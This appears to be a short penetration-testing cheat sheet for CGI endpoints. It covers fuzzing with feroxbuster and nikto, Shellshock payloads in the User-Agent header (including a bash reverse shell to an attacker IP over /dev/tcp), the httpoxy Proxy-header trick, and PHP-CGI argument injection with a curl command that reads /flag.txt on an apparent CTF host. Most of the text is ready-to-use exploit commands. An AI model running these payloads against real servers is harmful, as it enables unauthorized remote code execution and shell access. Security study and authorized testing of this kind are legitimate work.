We can fuzz for CGI endpoints using CGIs.txt and CGI-Microsoft.fuzz.txt from SecList

#Linux
feroxbuster -u http://<TARGET> -w /usr/share/SecList/Discovery/Web-Content/CGIs.txt

#Windows
feroxbuster -u http://<TARGET> -w /usr/share/SecList/Discovery/Web-Content/CGI-Microsoft.fuzz.txt

We can test for CGI vulns using nikto

nikto -h <TARGET> -C all

If we found the CGI script under /cgi-bin/, modifying HTTP header to remote code execution.

#reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://<TARGET>/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'

#Blind
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://<TARGET>/cgi-bin/admin.cgi

#reverse shell
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/<ATTACKING_IP>/<PORT> 0>&1' http://<TARGET>/cgi-bin/admin.cgi

CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"

As the HTTP_PROXY variable could be used by the web server. Try to send a header containing: "Proxy: <IP_attacker>:<PORT>" and if the server performs any request during the session. You will be able to capture each request made by the server.

Basically if cgi is active and php is "old" (<5.3.12 / < 5.4.2) you can execute code. In order t exploit this vulnerability you need to access some PHP file of the web server without sending parameters (specially without sending the character "="). Then, in order to test this vulnerability, you could access for example /index.php?-s (note the -s) and source code of the application will appear in the response.

Then, in order to obtain RCE you can send this special query: /?-d allow_url_include=1 -d auto_prepend_file=php://input and the PHP code to be executed in the body of the request.

curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"